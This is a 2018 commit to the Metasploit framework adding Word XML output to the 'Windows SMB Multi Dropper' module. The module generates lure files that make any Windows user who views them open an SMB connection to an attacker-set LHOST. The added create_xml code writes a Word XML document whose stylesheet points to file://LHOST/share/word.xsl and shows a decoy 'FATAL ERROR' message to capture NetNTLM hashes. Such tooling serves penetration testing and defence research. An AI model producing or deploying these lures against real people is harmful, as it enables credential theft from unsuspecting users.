Added auxiliary/fileformat/multidrop support for Word XML documents

rapid7 · Sep 5, 2018 · 14aee3a · 14aee3a
1 parent d25aad5
commit 14aee3a
Showing 1 changed file with 22 additions and 4 deletions.
diff --git a/modules/auxiliary/fileformat/multidrop.rb b/modules/auxiliary/fileformat/multidrop.rb
@@ -13,28 +13,30 @@ def initialize(info={})
         'Name'          => 'Windows SMB Multi Dropper',
         'Description'   => %q{
           This module dependent on the given filename extension creates either
-          a .lnk, .scf, .url, desktop.ini file which includes a reference
+          a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference
           to the the specified remote host, causing SMB connections to be initiated
           from any user that views the file.
         },
         'License'       => MSF_LICENSE,
         'Author'        =>
             [
               'Richard Davy - secureyourit.co.uk',  #Module written by Richard Davy
-              'Lnk Creation Code by Mubix'          #Lnk Creation Code written by Mubix
+              'Lnk Creation Code by Mubix',         #Lnk Creation Code written by Mubix
+              'asoto-r7'                            #Word XML creation code
             ],
         'Platform'      => [ 'win' ],
         'References'    =>
         [
           ['URL', 'https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018'],
-          ['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/']
+          ['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/'],
+          ['URL', 'https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/'],
         ]
 
       ))
     register_options(
       [
         OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),
-        OptString.new("FILENAME", [ true, "Filename - supports *.lnk, *.scf, *.url, desktop.ini", "word.lnk"]),
+        OptString.new("FILENAME", [ true, "Filename - supports *.lnk, *.scf, *.url, *.xml, desktop.ini", "word.lnk"]),
       ])
   end
 
@@ -47,6 +49,10 @@ def run
         create_desktopini
     elsif datastore['FILENAME'].chars.last(3).join=="url"
         create_url
+    elsif datastore['FILENAME'].chars.last(3).join=="xml"
+        create_xml
+    else
+        fail_with(Failure::BadConfig,"Invalid FILENAME option")
     end
   end
 
@@ -137,4 +143,16 @@ def create_url
     file_create(url)
   end
 
+  def create_xml
+    xml=""
+    xml << "<?xml version='1.0' encoding='utf-8' ?>"
+    xml << "<?mso-application progid='Word.Document'?>"
+    xml << "<?xml-stylesheet type='text/xsl' href='file://#{datastore['LHOST']}/share/word.xsl'?>"
+    xml << "<Text>"
+    xml << " FATAL ERROR: The document failed to render properly."
+    xml << "</Text>"
+
+    file_create(xml)
+  end
+
 end